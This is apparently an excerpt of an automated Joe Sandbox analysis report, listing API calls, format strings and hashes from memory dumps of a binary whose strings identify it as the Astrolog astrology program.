                                          • Associated: 00000006.00000002.3623779733.000000006C470000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623779733.000000006C473000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623779733.000000006C478000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623779733.000000006C47C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623779733.000000006C47E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623779733.000000006C480000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623887245.000000006C483000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_6c350000_Fj0RhXL.jbxd
                                          Similarity
                                          • API ID: Button$Checked$Check$Item$Text$Radio_memset$Dialog
                                          • String ID: None$aspect count$required object$text columns
                                          • API String ID: 3830697383-2213102871
                                          • Opcode ID: a86f981029c5075e8ef48356a3231ad3c018b2ba078dbddb4465b086ec48977d
                                          • Instruction ID: a181a4736b8f707bceecfc95807cd1c1796c7f2eea26e69d18c5df507ac67bce
                                          • Opcode Fuzzy Hash: a86f981029c5075e8ef48356a3231ad3c018b2ba078dbddb4465b086ec48977d
                                          • Instruction Fuzzy Hash: AAD1D271A44305AFEB00EF61DC85E7B7BF8EB9AB05F10442EF24096180DBB58615DFA2
                                          APIs
                                          • GetDlgItemInt.USER32(?,0000046F,?,00000001), ref: 6C3ACFAB
                                          • GetDlgItemInt.USER32(?,0000046C,00000000,00000001), ref: 6C3ACFB9
                                          • GetDlgItemInt.USER32(?,0000046D,00000000,00000001), ref: 6C3ACFC8
                                          • GetDlgItemInt.USER32(?,00000470,00000000,00000001), ref: 6C3ACFD7
                                          • IsDlgButtonChecked.USER32(?,00000523), ref: 6C3AD021
                                          • CheckMenuItem.USER32(00009C8F,-00000008), ref: 6C3AD046
                                          • IsDlgButtonChecked.USER32(?,00000524), ref: 6C3AD062
                                          • IsDlgButtonChecked.USER32(?,0000051A), ref: 6C3AD06F
                                          • IsDlgButtonChecked.USER32(?,0000051B), ref: 6C3AD07C
                                          • IsDlgButtonChecked.USER32(?,00000518), ref: 6C3AD089
                                          • IsDlgButtonChecked.USER32(?,00000520), ref: 6C3AD096
                                          • IsDlgButtonChecked.USER32(?,00000521), ref: 6C3AD0A3
                                          • IsDlgButtonChecked.USER32(?,00000525), ref: 6C3AD0B0
                                          • IsDlgButtonChecked.USER32(?,0000051E), ref: 6C3AD0BD
                                          • IsDlgButtonChecked.USER32(?,0000051D), ref: 6C3AD0CA
                                          • IsDlgButtonChecked.USER32(?,0000051C), ref: 6C3AD0D7
                                          • IsDlgButtonChecked.USER32(?,0000051F), ref: 6C3AD0EC
                                          • IsDlgButtonChecked.USER32(?,00000519), ref: 6C3AD0F9
                                          • IsDlgButtonChecked.USER32(?,00000522), ref: 6C3AD10E
                                          • IsDlgButtonChecked.USER32(?,000004B8), ref: 6C3AD133
                                          • IsDlgButtonChecked.USER32(?,000004B9), ref: 6C3AD147
                                          • IsDlgButtonChecked.USER32(?,000004BA), ref: 6C3AD15F
                                          • IsDlgButtonChecked.USER32(?,000004BF), ref: 6C3AD1C5
                                          • IsDlgButtonChecked.USER32(?,000004C0), ref: 6C3AD1D9
                                          • IsDlgButtonChecked.USER32(?,000004C1), ref: 6C3AD1F1
                                          • EndDialog.USER32(?,00000001), ref: 6C3AD20D
                                          • CheckDlgButton.USER32(?,00000523), ref: 6C3AD264
                                          • SetDlgItemInt.USER32(?,0000046F,00000001), ref: 6C3AD27A
                                          • CheckDlgButton.USER32(?,00000524), ref: 6C3AD288
                                          • CheckDlgButton.USER32(?,0000051A), ref: 6C3AD296
                                          • CheckDlgButton.USER32(?,0000051B), ref: 6C3AD2A4
                                          • CheckDlgButton.USER32(?,00000518), ref: 6C3AD2B2
                                          • CheckDlgButton.USER32(?,00000520), ref: 6C3AD2C0
                                          • CheckDlgButton.USER32(?,00000521), ref: 6C3AD2CE
                                          • CheckDlgButton.USER32(?,00000525), ref: 6C3AD2DC
                                          • CheckDlgButton.USER32(?,0000051E), ref: 6C3AD2EA
                                          • CheckDlgButton.USER32(?,0000051D), ref: 6C3AD2F8
                                          • CheckDlgButton.USER32(?,0000051C), ref: 6C3AD306
                                          • SetDlgItemInt.USER32(?,0000046C,00000001), ref: 6C3AD316
                                          • CheckDlgButton.USER32(?,0000051F), ref: 6C3AD324
                                          • CheckDlgButton.USER32(?,00000519,00000000), ref: 6C3AD338
                                          • SetDlgItemInt.USER32(?,0000046D,00000001), ref: 6C3AD348
                                          • CheckDlgButton.USER32(?,00000522), ref: 6C3AD356
                                          • SetDlgItemInt.USER32(?,00000470,00000001), ref: 6C3AD366
                                          • CheckRadioButton.USER32(?,000004B7,000004BD,000004BB), ref: 6C3AD3C4
                                          • CheckRadioButton.USER32(?,000004BE,000004C1,000004C1), ref: 6C3AD3F7
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.3623600753.000000006C351000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C350000, based on PE: true
                                          • Associated: 00000006.00000002.3623582983.000000006C350000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623659645.000000006C3FD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623695592.000000006C447000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623715559.000000006C449000.00000008.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623742172.000000006C46D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623760984.000000006C46E000.00000008.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623779733.000000006C470000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623779733.000000006C473000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623779733.000000006C478000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623779733.000000006C47C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623779733.000000006C47E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623779733.000000006C480000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623887245.000000006C483000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_6c350000_Fj0RhXL.jbxd
                                          Similarity
                                          • API ID: Button$Checked$Check$Item$Radio$DialogMenu
                                          • String ID: Arabic part$Biorhythm days$astro-graph step$wheel row
                                          • API String ID: 2643506611-3563571515
                                          • Opcode ID: a79fd2358d277d15651eca5c43bc72931a5922b7f8c7873dcf715f91b17a66bd
                                          • Instruction ID: 66f0a1100f8c386417e35e5a743ae1f821e74bfdd79bf5184911b645acf0a7bd
                                          • Opcode Fuzzy Hash: a79fd2358d277d15651eca5c43bc72931a5922b7f8c7873dcf715f91b17a66bd
                                          • Instruction Fuzzy Hash: 50B1C870B41704AAEB00EF768C45F7B3EB9EB57B44F20401AFA149A5D4D7B98412CF61
                                          APIs
                                          • _memmove.LIBCMT ref: 6C363F60
                                          • _sprintf.LIBCMT ref: 6C363FDA
                                          • _sprintf.LIBCMT ref: 6C36406B
                                          • __floor_pentium4.LIBCMT ref: 6C36409A
                                          • _sprintf.LIBCMT ref: 6C3640B1
                                          • _sprintf.LIBCMT ref: 6C3640E5
                                            • Part of subcall function 6C371AD3: SetTextColor.GDI32(00000000), ref: 6C371B19
                                          • _sprintf.LIBCMT ref: 6C364120
                                            • Part of subcall function 6C3714FC: TextOutA.GDI32(-00000005,00000017,?,00000001,00000001), ref: 6C3715C4
                                            • Part of subcall function 6C3714FC: EndPage.GDI32(00000000), ref: 6C371684
                                            • Part of subcall function 6C3714FC: StartPage.GDI32 ref: 6C371690
                                            • Part of subcall function 6C3714FC: SetMapMode.GDI32(00000008), ref: 6C37169E
                                            • Part of subcall function 6C3714FC: SetViewportOrgEx.GDI32(00000000,00000000,00000000), ref: 6C3716AD
                                            • Part of subcall function 6C3714FC: GetDeviceCaps.GDI32(0000000A,00000000), ref: 6C3716BC
                                            • Part of subcall function 6C3714FC: GetDeviceCaps.GDI32(00000008,00000000), ref: 6C3716C7
                                            • Part of subcall function 6C3714FC: SetViewportExtEx.GDI32(00000000,?,00000000), ref: 6C3716D0
                                            • Part of subcall function 6C3714FC: SetWindowOrgEx.GDI32(00000000,00000000,00000000), ref: 6C3716DF
                                          • _sprintf.LIBCMT ref: 6C364161
                                          • _sprintf.LIBCMT ref: 6C364216
                                          • _sprintf.LIBCMT ref: 6C364245
                                          • __floor_pentium4.LIBCMT ref: 6C364286
                                          • _sprintf.LIBCMT ref: 6C36429D
                                          • _sprintf.LIBCMT ref: 6C3642C8
                                          • __floor_pentium4.LIBCMT ref: 6C364309
                                          • _sprintf.LIBCMT ref: 6C364320
                                          • _sprintf.LIBCMT ref: 6C36437E
                                          • _sprintf.LIBCMT ref: 6C3643C7
                                          • _sprintf.LIBCMT ref: 6C364417
                                          • _sprintf.LIBCMT ref: 6C364457
                                            • Part of subcall function 6C3D1F84: __output_l.LIBCMT ref: 6C3D1FDF
                                          • _sprintf.LIBCMT ref: 6C3644AF
                                          • _sprintf.LIBCMT ref: 6C3644EF
                                          • _memmove.LIBCMT ref: 6C364521
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.3623600753.000000006C351000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C350000, based on PE: true
                                          • Associated: 00000006.00000002.3623582983.000000006C350000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623659645.000000006C3FD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623695592.000000006C447000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623715559.000000006C449000.00000008.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623742172.000000006C46D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623760984.000000006C46E000.00000008.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623779733.000000006C470000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623779733.000000006C473000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623779733.000000006C478000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623779733.000000006C47C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623779733.000000006C47E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623779733.000000006C480000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623887245.000000006C483000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_6c350000_Fj0RhXL.jbxd
                                          Similarity
                                          • API ID: _sprintf$__floor_pentium4$CapsDevicePageTextViewport_memmove$ColorModeStartWindow__output_l
                                          • String ID: Num :$Plus zones: %d/%d = %.2f%% - $Zone:$ . $ Plus House Sign Loc. Ret. Latitude Velocity Sec.18 Sec.12$ %2d$ %2d $ %2d%c$ %c$ %c $ [%2d%s house] $%-4.4s: $%.3f$%5.2f$%5.3f$%7.4f$%7.5f$Body Sector $H;Gl$H?Gl$Planets in plus zones: %d/%d = %.2f%%$Plus House Sign Ret. Latit. Veloc. 18 12$Sec
                                          • API String ID: 3234483138-1638245833
                                          • Opcode ID: 00983a753b16ae1ded3a3049c4898d07dd4d3298bfe9cbf12153c11891380ac6
                                          • Instruction ID: 2ed925e324fc0eec55dce3ab3b2d8b245b78c8c44b8ac14ae9db51b0e244120b
                                          • Opcode Fuzzy Hash: 00983a753b16ae1ded3a3049c4898d07dd4d3298bfe9cbf12153c11891380ac6
                                          • Instruction Fuzzy Hash: 24F104B3D101889BCB20EBA2DC51FEDB778EF05308F040965D48AA6A84DF75D958CF66
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.3623600753.000000006C351000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C350000, based on PE: true
                                          • Associated: 00000006.00000002.3623582983.000000006C350000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623659645.000000006C3FD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623695592.000000006C447000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623715559.000000006C449000.00000008.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623742172.000000006C46D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623760984.000000006C46E000.00000008.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623779733.000000006C470000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623779733.000000006C473000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623779733.000000006C478000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623779733.000000006C47C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623779733.000000006C47E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623779733.000000006C480000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623887245.000000006C483000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_6c350000_Fj0RhXL.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: %13.9f %13.9f$%-4.4s$%-4d$%.3s: %2d %2d %10.7f$%3d %.3s %12.9f,$%4d %13.9f,$%cYF $%cqb %.3s %d %d %s %s $%czi "%s" "%s"$%d%d%d%.2f%.2f%.2f%.2f$%s %s$%s%s$710$@AI%s ; %s chart info.$@AP%s ; %s chart positions.$Astrolog$Autodetect$Can't output chart with no time/space to file.$File '%s' can not be created.$H_%c: %2d %2d %10.7f$[%c]: %3d %12.8f
                                          • API String ID: 0-1133567577
                                          • Opcode ID: deae352a8a8ed690abb5691d368e3e93451c7032b4f9f1c36713eec18a4ed01b
                                          • Instruction ID: 5cceeb8f60be313b3b71f0217e86d3f3fb9c6cf8d65e8e2ce3f57967ec9b6f03
                                          • Opcode Fuzzy Hash: deae352a8a8ed690abb5691d368e3e93451c7032b4f9f1c36713eec18a4ed01b
                                          • Instruction Fuzzy Hash: F8F19BB2E08208EADF15FB65DC48EAC7B78FB06704F120959E4C513955DB3A5828CFA6
                                          APIs
                                          Strings
                                          • /languagelevel where{pop languagelevel}{1}ifelse 2 lt{/sf{exch findfont exch dup type/arraytype eq{makefont}{scalefont}ifelse setfont}bind def/rf{gsave newpath4 -2 roll moveto dup 0 exch rlineto exch 0 rlineto neg 0 exch rlineto closepathfill grestore}bind, xrefs: 6C3C8FDE, 6C3C90AE
                                          • EPSF-2.0, xrefs: 6C3C8F36
                                          • %%%%BoundingBox: %d %d %d %d, xrefs: 6C3C907A
                                          • %%%%Title: %s, xrefs: 6C3C8F4F
                                          • %%%%DocumentFonts: (atend), xrefs: 6C3C9032
                                          • %%%%CreationDate: %s, xrefs: 6C3C8F7E
                                          • %%%%Creator: %s %s, xrefs: 6C3C8F69
                                          • October 2020, xrefs: 6C3C8F79
                                          • %%%%EndProcSet, xrefs: 6C3C90BE
                                          • %%!PS-Adobe-2.0, xrefs: 6C3C8F1B
                                          • %%%%BoundingBox: 0 0 %d %d, xrefs: 6C3C8FAA
                                          • %%%%Page: 1 1, xrefs: 6C3C90D1
                                          • gsave, xrefs: 6C3C90EB
                                          • %%%%EndComments, xrefs: 6C3C8FBA, 6C3C908A
                                          • 0 0 %d %d rc, xrefs: 6C3C900A
                                          • %%%%EndSetup, xrefs: 6C3C8FEE
                                          • Astrolog, xrefs: 6C3C8F64
                                          • 7.10, xrefs: 6C3C8F5F
                                          • %%%%Pages: 1 1, xrefs: 6C3C9022
                                          • %%%%BeginSetup, xrefs: 6C3C8FCA
                                          • %%%%BeginProcSet: common, xrefs: 6C3C909A
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.3623600753.000000006C351000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C350000, based on PE: true
                                          • Associated: 00000006.00000002.3623582983.000000006C350000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623659645.000000006C3FD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623695592.000000006C447000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623715559.000000006C449000.00000008.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623742172.000000006C46D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623760984.000000006C46E000.00000008.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623779733.000000006C470000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623779733.000000006C473000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623779733.000000006C478000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623779733.000000006C47C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623779733.000000006C47E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623779733.000000006C480000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623887245.000000006C483000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_6c350000_Fj0RhXL.jbxd
                                          Similarity
                                          • API ID: _fprintf$__ftbuf__lock_file__output_l__stbuf
                                          • String ID: %%%%Title: %s$ EPSF-2.0$%%!PS-Adobe-2.0$%%%%BeginProcSet: common$%%%%BeginSetup$%%%%BoundingBox: %d %d %d %d$%%%%BoundingBox: 0 0 %d %d$%%%%CreationDate: %s$%%%%Creator: %s %s$%%%%DocumentFonts: (atend)$%%%%EndComments$%%%%EndProcSet$%%%%EndSetup$%%%%Page: 1 1$%%%%Pages: 1 1$/languagelevel where{pop languagelevel}{1}ifelse 2 lt{/sf{exch findfont exch dup type/arraytype eq{makefont}{scalefont}ifelse setfont}bind def/rf{gsave newpath4 -2 roll moveto dup 0 exch rlineto exch 0 rlineto neg 0 exch rlineto closepathfill grestore}bind$0 0 %d %d rc$7.10$Astrolog$October 2020$gsave
                                          • API String ID: 868309879-2695015111
                                          • Opcode ID: 2edb1d63a3aaeb6cb03ff98040f47ca226a336ceba24e91b27139a883bb8ff1f
                                          • Instruction ID: 1a62d50d8b5a1dc795d07a23f725d904d40bc3700b3e7e469996450c7aec83dc
                                          • Opcode Fuzzy Hash: 2edb1d63a3aaeb6cb03ff98040f47ca226a336ceba24e91b27139a883bb8ff1f
                                          • Instruction Fuzzy Hash: D64189727422547ECE91F716CC05F983A31D74722DB219432F148A3961E7325DAAEE85
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.3623600753.000000006C351000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C350000, based on PE: true
                                          • Associated: 00000006.00000002.3623582983.000000006C350000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623659645.000000006C3FD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623695592.000000006C447000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623715559.000000006C449000.00000008.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623742172.000000006C46D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623760984.000000006C46E000.00000008.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623779733.000000006C470000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623779733.000000006C473000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623779733.000000006C478000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623779733.000000006C47C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623779733.000000006C47E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623779733.000000006C480000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623887245.000000006C483000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_6c350000_Fj0RhXL.jbxd
                                          Similarity
                                          • API ID: _sprintf
                                          • String ID: %s%cT Zone %s%s$%.3s %s$%s%s houses$%s, %s$'s sign$2D $3D $A$Barycentric$Composite chart$Geocentric$Heliocentric$Julian Day: %13.5f$No time or space$Progressed To: %s$Rotate: %.3s to %.3s%s$Sidereal$Solar: %.4s%s on %.3s$Special: Decan mode$Special: Domal mode$Special: Dwad level %d$Special: Dwad mode$Special: Geodetic houses$Special: Harmonic %.7s$Special: Navamsa mode$Topocentric$Tropical
                                          • API String ID: 1467051239-3787655438
                                          • Opcode ID: 6bad1f0a9d893197690006c2f7a12c6a1ae7fdd4cdf48cfddd31d1bb23be60c3
                                          • Instruction ID: 03a6908a6dc1c1bd42db0bc5969e771439d141c7ffcd7245c7b9c15b7905fd79
                                          • Opcode Fuzzy Hash: 6bad1f0a9d893197690006c2f7a12c6a1ae7fdd4cdf48cfddd31d1bb23be60c3
                                          • Instruction Fuzzy Hash: 0EE13EB2A045449FCF00FFA5C948DDA377CEB9A318B24465AE544FBE44DB36A444CFA2
                                          APIs
                                          • PrintDlgA.COMDLG32(6C4488B0), ref: 6C3A9D86
                                          • GlobalLock.KERNEL32(00000000), ref: 6C3A9DAF
                                          • GlobalUnlock.KERNEL32 ref: 6C3A9DCC
                                          • GlobalLock.KERNEL32(00000000), ref: 6C3A9DDC
                                          • CreateDCA.GDI32(?,?,?,?), ref: 6C3A9DEB
                                          • GlobalUnlock.KERNEL32(00000000), ref: 6C3A9E03
                                          • GlobalFree.KERNEL32(00000000), ref: 6C3A9E1B
                                          • GlobalFree.KERNEL32(00000000), ref: 6C3A9E2D
                                          • SetAbortProc.GDI32(00000000,6C3AA01F), ref: 6C3A9E3B
                                          • StartDocA.GDI32(00000000,?), ref: 6C3A9E57
                                          • DeleteDC.GDI32(00000000), ref: 6C3A9E62
                                          • CreateDialogParamA.USER32(000000C9,6C3AA088,00000000), ref: 6C3A9E8A
                                          • ShowWindow.USER32(00000000,00000001), ref: 6C3A9EA2
                                          • EnableWindow.USER32(00000000), ref: 6C3A9EAF
                                          • StartPage.GDI32(00000000), ref: 6C3A9EB6
                                          • SetMapMode.GDI32(00000000,00000008), ref: 6C3A9F04
                                          • GetDeviceCaps.GDI32(00000000,00000008), ref: 6C3A9F13
                                          • GetDeviceCaps.GDI32(00000000,0000000A), ref: 6C3A9F1B
                                          • SetViewportOrgEx.GDI32(00000000,00000000,00000000,00000000), ref: 6C3A9F24
                                          • SetViewportExtEx.GDI32(00000000,?,?,00000000), ref: 6C3A9F32
                                          • EndPage.GDI32(00000000), ref: 6C3A9FE9
                                          • EndDoc.GDI32(00000000), ref: 6C3A9FF0
                                          • EnableWindow.USER32(00000001,?), ref: 6C3A9FFE
                                          • DestroyWindow.USER32 ref: 6C3AA00A
                                          • DeleteDC.GDI32(00000000), ref: 6C3AA011
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.3623600753.000000006C351000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C350000, based on PE: true
                                          • Associated: 00000006.00000002.3623582983.000000006C350000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623659645.000000006C3FD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623695592.000000006C447000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623715559.000000006C449000.00000008.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623742172.000000006C46D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623760984.000000006C46E000.00000008.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623779733.000000006C470000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623779733.000000006C473000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623779733.000000006C478000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623779733.000000006C47C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623779733.000000006C47E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623779733.000000006C480000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623887245.000000006C483000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_6c350000_Fj0RhXL.jbxd
                                          Similarity
                                          • API ID: Global$Window$CapsCreateDeleteDeviceEnableFreeLockPageStartUnlockViewport$AbortDestroyDialogModeParamPrintProcShow
                                          • String ID: Astrolog
                                          • API String ID: 180290428-1561296214
                                          • Opcode ID: 9271cbce6fab2cea5a74c791052ae0f7df62dd311dde63180883052b44a94b1d
                                          • Instruction ID: 88f1becc256f3395fb71092ebf0febb8632e6a814fc0a15d1443b33536ede921
                                          • Opcode Fuzzy Hash: 9271cbce6fab2cea5a74c791052ae0f7df62dd311dde63180883052b44a94b1d
                                          • Instruction Fuzzy Hash: 097117B1B00205EBDF00FFA6DC8895A7BF9FB8A3197208817F515E6210E7358851DF94
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.3623600753.000000006C351000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C350000, based on PE: true
                                          • Associated: 00000006.00000002.3623582983.000000006C350000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623659645.000000006C3FD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623695592.000000006C447000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623715559.000000006C449000.00000008.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623742172.000000006C46D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623760984.000000006C46E000.00000008.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623779733.000000006C470000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623779733.000000006C473000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623779733.000000006C478000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623779733.000000006C47C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623779733.000000006C47E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623779733.000000006C480000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623887245.000000006C483000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_6c350000_Fj0RhXL.jbxd
                                          Similarity
                                          • API ID: _sprintf
                                          • String ID: $1 $V $ $ 2>$%.3s$%02d"$%02d'$%2d%c$%3d$%c%2d$H;Gl$H;Gl$H;Gl$H;Gl$H;Gl
                                          • API String ID: 1467051239-1109211154
                                          • Opcode ID: fc53bf8eb42a2cb0bf21c37e4047be3e70631b38edbe73af50ce12fe7c8ddb05
                                          • Instruction ID: c7a3061981fd02ed37ca24b22c5c14cbc9a706e028593d10681f9d5d60edc463
                                          • Opcode Fuzzy Hash: fc53bf8eb42a2cb0bf21c37e4047be3e70631b38edbe73af50ce12fe7c8ddb05
                                          • Instruction Fuzzy Hash: 70F127B3E002848BEF15DBA2C852FEC7775EB06398F140519D441DBE98CB79D949CE26
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.3623600753.000000006C351000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C350000, based on PE: true
                                          • Associated: 00000006.00000002.3623582983.000000006C350000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623659645.000000006C3FD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623695592.000000006C447000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623715559.000000006C449000.00000008.00000001.01000000.00000006.sdmpDownload File
